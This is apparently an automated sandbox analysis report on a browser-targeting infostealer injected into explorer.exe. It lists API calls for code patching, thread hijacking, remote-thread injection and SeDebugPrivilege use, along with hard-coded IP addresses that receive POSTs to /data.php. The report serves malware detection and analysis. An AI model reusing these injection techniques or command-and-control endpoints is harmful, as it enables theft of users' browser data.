                                                                                        control_flow_graph 544 10a57d20-10a57d4f 545 10a57d51-10a57d54 544->545 546 10a57d59-10a57d72 VirtualProtect 544->546 545->546 547 10a57d74-10a57d79 546->547 548 10a57d7e-10a57d80 546->548 551 10a57e0d-10a57e21 547->551 549 10a57da0-10a57da9 548->549 550 10a57d82-10a57d94 548->550 554 10a57dbc-10a57dc0 549->554 555 10a57dab-10a57dba 549->555 552 10a57d96-10a57d9e 550->552 553 10a57dc3-10a57dd9 VirtualProtect call 10a7c100 550->553 552->553 557 10a57ddf-10a57e0b FlushInstructionCache 553->557 554->553 555->553 557->551
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                        • String ID:
                                                                                        • API String ID: 882653843-0
                                                                                        • Opcode ID: 9601299265cffe8182ae656f98b40eb6c7535b85eb9a90772e96f75ea20f71e0
                                                                                        • Instruction ID: f7ee22e1597c5b4ee8606e44e09e838fcd4027bc58a5b900da6818a4c9392c0d
                                                                                        • Opcode Fuzzy Hash: 9601299265cffe8182ae656f98b40eb6c7535b85eb9a90772e96f75ea20f71e0
                                                                                        • Instruction Fuzzy Hash: 6A3189B320868186D7118F35A5003AD7B70FB09F88F498216EF984779ACB7CD495CB55
                                                                                        Function 10A58070 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 558 10a58070-10a5809f call 10a57e80 561 10a580a1-10a580a4 558->561 562 10a580f8-10a5810d 558->562 561->562 563 10a580a6-10a580ab 561->563 564 10a580b0-10a580ca OpenThread 563->564 565 10a580ec-10a580f1 564->565 566 10a580cc-10a580de SuspendThread call 10a58470 564->566 565->564 568 10a580f3 565->568 569 10a580e3-10a580e6 call 10a7c030 566->569 568->562 569->565
                                                                                        APIs
                                                                                          • Part of subcall function 10A57E80: GetCurrentProcessId.KERNEL32 ref: 10A57EDB
                                                                                          • Part of subcall function 10A57E80: GetCurrentThreadId.KERNEL32 ref: 10A57EE7
                                                                                          • Part of subcall function 10A57E80: HeapAlloc.KERNEL32 ref: 10A57F11
                                                                                          • Part of subcall function 10A57E80: Thread32Next.KERNEL32 ref: 10A57F70
                                                                                          • Part of subcall function 10A57E80: CloseHandle.KERNEL32 ref: 10A57F80
                                                                                        • OpenThread.KERNEL32 ref: 10A580BE
                                                                                        • SuspendThread.KERNEL32 ref: 10A580CF
                                                                                          • Part of subcall function 10A58470: GetThreadContext.KERNEL32 ref: 10A584A4
                                                                                          • Part of subcall function 10A58470: SetThreadContext.KERNEL32 ref: 10A58564
                                                                                        • CloseHandle.KERNEL32 ref: 10A580E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                        • String ID:
                                                                                        • API String ID: 4205413918-0
                                                                                        • Opcode ID: bf31ed94d70be6466f5c7d27e9e27609f51f1945293116d9b6c20b3f27308a9d
                                                                                        • Instruction ID: a082d7b8910dd8e330a29113db735b75655c46c087a9bdafe6321a27f0c5c515
                                                                                        • Opcode Fuzzy Hash: bf31ed94d70be6466f5c7d27e9e27609f51f1945293116d9b6c20b3f27308a9d
                                                                                        • Instruction Fuzzy Hash: EA015E36215B8486D714DF16A48051EB7A0F789BC4F449128DF9913B18CF39D5AACB04
                                                                                        Function 10A58380 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 10A57E30: Sleep.KERNEL32 ref: 10A57E5C
                                                                                        • HeapCreate.KERNEL32 ref: 10A5839D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeapSleep
                                                                                        • String ID:
                                                                                        • API String ID: 221814145-0
                                                                                        • Opcode ID: 4c4f45cb6a6cbc78b2c4c03e8ac96ba245bdaa5670f6ba292475323c111a2f6e
                                                                                        • Instruction ID: f704c32563a1023e0e810504b54ee535365aa32467b88354082a6f7293ccc202
                                                                                        • Opcode Fuzzy Hash: 4c4f45cb6a6cbc78b2c4c03e8ac96ba245bdaa5670f6ba292475323c111a2f6e
                                                                                        • Instruction Fuzzy Hash: 3FE09228B02B0443FB15ABB5699335E1141FF08351F481938EE481A341EE7CA8EE5766

                                                                                        Non-executed Functions

                                                                                        Function 10A7A872 Relevance: 35.5, APIs: 28, Instructions: 461COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A51F80: char_traits.LIBCPMT ref: 10A51FBE
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A891
                                                                                          • Part of subcall function 10A6978C: RtlPcToFileHeader.NTDLL ref: 10A6981B
                                                                                          • Part of subcall function 10A6978C: RaiseException.KERNEL32 ref: 10A6985A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A8B1
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A8EE
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A91A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A93A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A96E
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A9AE
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A9D1
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7A9F1
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AA11
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AA31
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AA51
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AA71
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AA91
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AABA
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AADA
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AAFA
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AB1A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AB44
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AB6E
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AB9A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7ABD1
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7ABE8
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AC1E
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AC5E
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7AC8A
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7ACAA
                                                                                        • _CxxThrowException.LIBCMT ref: 10A7ACC1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception$Throw$FileHeaderRaisechar_traits
                                                                                        • String ID:
                                                                                        • API String ID: 1722249982-0
                                                                                        • Opcode ID: 7fae99fe204c375ef2b857b3db7e9b56999b5be0da53acbf3e48e5b9b0576df3
                                                                                        • Instruction ID: b9414b4e7e35c636e1f778876de79c58811334069c4bc784593b541c9826251a
                                                                                        • Opcode Fuzzy Hash: 7fae99fe204c375ef2b857b3db7e9b56999b5be0da53acbf3e48e5b9b0576df3
                                                                                        • Instruction Fuzzy Hash: 5991426A711A448ADB1CEF72AD520BE2366F7D47C0F18D93ABE5A4FA08CF75D4218740
                                                                                        Function 10A51370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                        • String ID: @
                                                                                        • API String ID: 596952117-2766056989
                                                                                        • Opcode ID: 72416285b19d92f3d317a0272894f5a4096a303f523a6f79f279e681f8c24e07
                                                                                        • Instruction ID: 283afa3ad010e582b3c4853e4813d38d242376add378a3a184187e01aba31727
                                                                                        • Opcode Fuzzy Hash: 72416285b19d92f3d317a0272894f5a4096a303f523a6f79f279e681f8c24e07
                                                                                        • Instruction Fuzzy Hash: 0D812A76704B80CAEB60CF62E84479EB7A4FB88B98F414219EE8D47B18DF78D555CB40
                                                                                        Function 10A52EE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A52E00: CreateToolhelp32Snapshot.KERNEL32 ref: 10A52E31
                                                                                          • Part of subcall function 10A52E00: Process32First.KERNEL32 ref: 10A52E4F
                                                                                          • Part of subcall function 10A52E00: Process32Next.KERNEL32 ref: 10A52E6F
                                                                                          • Part of subcall function 10A52E00: Process32Next.KERNEL32 ref: 10A52E97
                                                                                        • GetCurrentProcess.KERNEL32 ref: 10A52F53
                                                                                        • OpenProcessToken.ADVAPI32 ref: 10A52F63
                                                                                        • LookupPrivilegeValueA.ADVAPI32 ref: 10A52F81
                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 10A52FA9
                                                                                        • CloseHandle.KERNEL32 ref: 10A52FB3
                                                                                        • OpenProcess.KERNEL32 ref: 10A53043
                                                                                        • OpenProcess.KERNEL32 ref: 10A5305A
                                                                                        • CloseHandle.KERNEL32 ref: 10A5308D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$OpenProcess32$CloseHandleNextToken$AdjustCreateCurrentFirstLookupPrivilegePrivilegesSnapshotToolhelp32Value
                                                                                        • String ID: SeDebugPrivilege$firefox.exe
                                                                                        • API String ID: 3464871389-4009583425
                                                                                        • Opcode ID: 8f3e1acc0248e2759dd5966139acb844f331417ac84fb33f54c5c3b709017e23
                                                                                        • Instruction ID: 4d3f9e870276af3aa9ffac368cfb47f2294ebc89f4d91eae3de9a03cbb355422
                                                                                        • Opcode Fuzzy Hash: 8f3e1acc0248e2759dd5966139acb844f331417ac84fb33f54c5c3b709017e23
                                                                                        • Instruction Fuzzy Hash: 29518C36704B4196EB00DBB2E5153ED73A2FB89BC8F8084259E4A57B58EF78D54DC380
                                                                                        Function 10A59110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86injectionmemorythreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 1113946311-2766056989
                                                                                        • Opcode ID: bfcff2f29c1c025c74f1b8ba777dda643b737d4915761e4d2266d5e0a1367d3f
                                                                                        • Instruction ID: a43dd0cacb910073976f3fe294b5be97e7d2bca5552274cf3136a1b85e4cea94
                                                                                        • Opcode Fuzzy Hash: bfcff2f29c1c025c74f1b8ba777dda643b737d4915761e4d2266d5e0a1367d3f
                                                                                        • Instruction Fuzzy Hash: 7321C33630478495EB60DF12B900B9BB668FB89FD4F8481299E8C4BB14DF3DC489CB40
                                                                                        Function 08B71125 Relevance: 6.7, APIs: 5, Instructions: 411COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • malloc.LIBCMT ref: 08B711AD
                                                                                          • Part of subcall function 08B89001: _NMSG_WRITE.LIBCMT ref: 08B8903B
                                                                                          • Part of subcall function 08B89001: _callnewh.LIBCMT ref: 08B8906F
                                                                                          • Part of subcall function 08B89001: _errno.LIBCMT ref: 08B8907A
                                                                                          • Part of subcall function 08B89001: _errno.LIBCMT ref: 08B89085
                                                                                        • free.LIBCMT ref: 08B71544
                                                                                        • free.LIBCMT ref: 08B7154C
                                                                                        • free.LIBCMT ref: 08B71554
                                                                                        • free.LIBCMT ref: 08B7155D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2761444284-0
                                                                                        • Opcode ID: 83652f59c73d5ad205df74a2773ab1fd1abe1684c41674b52da39e9e7cc8448f
                                                                                        • Instruction ID: 38c83c2a7b1940357e94b94c1f35c988c03ecff4817d52bd27fc6b09369ac6b6
                                                                                        • Opcode Fuzzy Hash: 83652f59c73d5ad205df74a2773ab1fd1abe1684c41674b52da39e9e7cc8448f
                                                                                        • Instruction Fuzzy Hash: BDD12F30718B488FDB68EF28D8596AA77E5FB99301F10062EE44BD3250DF78D546CB86
                                                                                        Function 10A66940 Relevance: 48.4, APIs: 32, Instructions: 363stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 615 10a66940-10a6696d call 10a665d0 618 10a66996-10a669a4 615->618 619 10a6696f-10a6697e 615->619 622 10a669aa-10a669ae 618->622 623 10a66aab-10a66aaf 618->623 620 10a66980-10a66986 call 10a91d10 619->620 621 10a6698b-10a66991 call 10a91d18 619->621 639 10a66c31-10a66c47 call 10a69fd0 620->639 621->639 626 10a669b4-10a66a2b wsprintfA call 10a5f6a0 * 3 lstrlenA 622->626 627 10a66a4f-10a66a59 622->627 628 10a66ab1-10a66ab7 623->628 629 10a66abf-10a66ac3 623->629 669 10a66e93-10a66e9e call 10a66eb0 626->669 670 10a66a31-10a66a41 memcpy 626->670 631 10a66a77-10a66a79 627->631 632 10a66a5b-10a66a72 memcpy 627->632 628->629 635 10a66ab9-10a66abd 628->635 636 10a66ac5-10a66ac9 629->636 637 10a66b42-10a66b53 629->637 641 10a66a9a-10a66aa6 call 10a66eb0 631->641 642 10a66a7b-10a66a95 memcpy 631->642 640 10a66c27-10a66c2c 632->640 635->629 638 10a66acb-10a66ad0 635->638 636->637 636->638 643 10a66b55-10a66b5b call 10a91d10 637->643 644 10a66b5d call 10a91d18 637->644 647 10a66ad2-10a66b09 call 10a5f350 StrStrIA 638->647 648 10a66b2d 638->648 640->639 641->640 642->640 653 10a66b63-10a66b67 643->653 644->653 667 10a66b24-10a66b27 free 647->667 668 10a66b0b-10a66b21 call 10a67e30 lstrlenA 647->668 656 10a66b34-10a66b3d 648->656 661 10a66b6d-10a66b71 653->661 662 10a66a48-10a66a4a 653->662 656->640 665 10a66b77-10a66b8b 661->665 666 10a66e1d-10a66e21 661->666 662->640 671 10a66ca3 665->671 672 10a66b91-10a66baa call 10a5f350 665->672 673 10a66e23-10a66e2e 666->673 674 10a66e7d-10a66e8d call 10a66770 666->674 667->648 668->667 669->640 670->662 680 10a66ca7-10a66cbd StrStrA 671->680 690 10a66c70-10a66c8e free StrStrA 672->690 691 10a66bb0-10a66c0a free malloc memcpy call 10a5f6a0 lstrlenA 672->691 677 10a66e34-10a66e3b 673->677 678 10a66e30-10a66e32 673->678 674->656 674->669 684 10a66e3d-10a66e48 malloc 677->684 685 10a66e4a-10a66e51 call 10a59730 677->685 678->677 686 10a66cc3-10a66ce3 call 10a5f350 680->686 687 10a66d9c-10a66da3 680->687 692 10a66e56-10a66e78 memcpy 684->692 685->692 704 10a66ce5-10a66cf1 StrToIntA 686->704 705 10a66cf3 686->705 695 10a66da5-10a66db0 malloc 687->695 696 10a66db2-10a66db9 realloc 687->696 697 10a66c17-10a66c1f call 10a66eb0 690->697 698 10a66c90-10a66ca1 690->698 707 10a66c0c-10a66c11 free 691->707 708 10a66c48-10a66c6e memcpy free call 10a66eb0 691->708 692->640 701 10a66dbe-10a66dd4 memcpy 695->701 696->701 714 10a66c22 697->714 698->680 706 10a66dd7-10a66ddb 701->706 710 10a66cfa-10a66d08 free 704->710 705->710 711 10a66ddd-10a66de1 706->711 712 10a66deb-10a66e15 lstrlenA memcpy 706->712 707->697 708->714 715 10a66d51-10a66d58 710->715 716 10a66d0a-10a66d11 710->716 711->712 712->666 714->640 720 10a66d67-10a66d6e realloc 715->720 721 10a66d5a-10a66d65 malloc 715->721 717 10a66d13-10a66d18 716->717 718 10a66d40-10a66d4c call 10a66770 716->718 722 10a66d1d-10a66d3e malloc memcpy 717->722 723 10a66d1a 717->723 718->715 725 10a66d73-10a66d9a memcpy 720->725 721->725 722->715 723->722 725->706
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: memcpy$malloc$free$CriticalSectionlstrlenrealloc$EnterLeavewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1602135189-0
                                                                                        • Opcode ID: cef80cbd2d3059d3ad3f08624fd7d5f4c53d8e275ce99e34ca697f5ba41137a2
                                                                                        • Instruction ID: d736ab1ddc59fad65cf71c26eb34418b4bf6e0db6441a66744138b20d1a1cd72
                                                                                        • Opcode Fuzzy Hash: cef80cbd2d3059d3ad3f08624fd7d5f4c53d8e275ce99e34ca697f5ba41137a2
                                                                                        • Instruction Fuzzy Hash: 0AE18B75301B418BDB20DF26E99439A77B1FB88BC8F805429DA8A47B50DFBDE485CB41
                                                                                        Function 10A56CB0 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 140networksleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleepfreerealloc
                                                                                        • String ID: /data.php$185.81.68.147$185.81.68.148$Content-Type: application/x-www-form-urlencodedConnection: close$Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$POST$err
                                                                                        • API String ID: 986109302-4063184111
                                                                                        • Opcode ID: c58fb7624804fb10596e9dd163f851635feff074fea24a56f43716a3821bd52a
                                                                                        • Instruction ID: 78ebecaea56556cbf2912234283fb433ac32b2ccf696db1d62beebd8bd7bf1dc
                                                                                        • Opcode Fuzzy Hash: c58fb7624804fb10596e9dd163f851635feff074fea24a56f43716a3821bd52a
                                                                                        • Instruction Fuzzy Hash: 6A516E36209B8486EB109F12F86479977B0FB89BD4F848529DECA43714EF7DC588CB52
                                                                                        Function 10A66760 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 193stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                        • String ID: 2
                                                                                        • API String ID: 4124047334-450215437
                                                                                        • Opcode ID: 1ba1ad9c3a61801d810d9d34205d3a1d7654cb3be012afce87558a6955ea61f7
                                                                                        • Instruction ID: 22f6d1616fd3edade91f5d54355d24ef0d1cabbc02a0d144316517ed4cd1351b
                                                                                        • Opcode Fuzzy Hash: 1ba1ad9c3a61801d810d9d34205d3a1d7654cb3be012afce87558a6955ea61f7
                                                                                        • Instruction Fuzzy Hash: F9719E74311B4185EB009B62ED943AE2BA1FF86FD9F800429DC8A47764EFBCD485C792
                                                                                        Function 10A6CCE0 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                        • String ID:
                                                                                        • API String ID: 4099253644-0
                                                                                        • Opcode ID: ccc64328af1b0db835cb9ef547914a3ef69308864fd2cada8bec7e818de75906
                                                                                        • Instruction ID: 273d8fa297e762408b192ea43677dbf64c23c8a2fd4b1adf7ae274e33d6747a0
                                                                                        • Opcode Fuzzy Hash: ccc64328af1b0db835cb9ef547914a3ef69308864fd2cada8bec7e818de75906
                                                                                        • Instruction Fuzzy Hash: 4831287AB11B49D1EF44DB11EA643F82374EF84BD8F990226999A472A4DFBCC4848353
                                                                                        Function 10A65D60 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 152COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 10A666E0: RtlInitializeCriticalSection.NTDLL ref: 10A66711
                                                                                          • Part of subcall function 10A666E0: RtlInitializeCriticalSection.NTDLL ref: 10A6671E
                                                                                        • GetModuleHandleA.KERNEL32 ref: 10A65DD9
                                                                                        • GetModuleFileNameA.KERNEL32 ref: 10A65E2E
                                                                                        • malloc.MSVCRT ref: 10A65E53
                                                                                        • CloseHandle.KERNEL32 ref: 10A65EAE
                                                                                        • free.MSVCRT ref: 10A65EB7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                        • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                        • API String ID: 308684148-2401417439
                                                                                        • Opcode ID: a1412ac3a69d47012cc114603df1c3ee24952c8f70254f48279a343966e18a6b
                                                                                        • Instruction ID: af24361f5644e6a5cb328053a4219c0edf74c59f2abfbad05d5b8b77a3836ced
                                                                                        • Opcode Fuzzy Hash: a1412ac3a69d47012cc114603df1c3ee24952c8f70254f48279a343966e18a6b
                                                                                        • Instruction Fuzzy Hash: 4C51AD35304B8585EA60DF21A8403DA77B5FB89BC8FC58126DACA83754EF7DC649C781
                                                                                        Function 10A5F6A0 Relevance: 17.6, APIs: 14, Instructions: 137stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1433255627-0
                                                                                        • Opcode ID: f84ef37f85fefa271c4a5bf0e81f22dc5829450e6e191b8aeb80007b9961f4af
                                                                                        • Instruction ID: 827090cc8f04793a6f70b716c2caa999ef1418e8568fe88e81796361e1313652
                                                                                        • Opcode Fuzzy Hash: f84ef37f85fefa271c4a5bf0e81f22dc5829450e6e191b8aeb80007b9961f4af
                                                                                        • Instruction Fuzzy Hash: AA517976305B808AEB24DF26E84479A73A1FB89BC8F405029DE9E43B19DF7CC549CB00
                                                                                        Function 10A5FAF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57stringthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
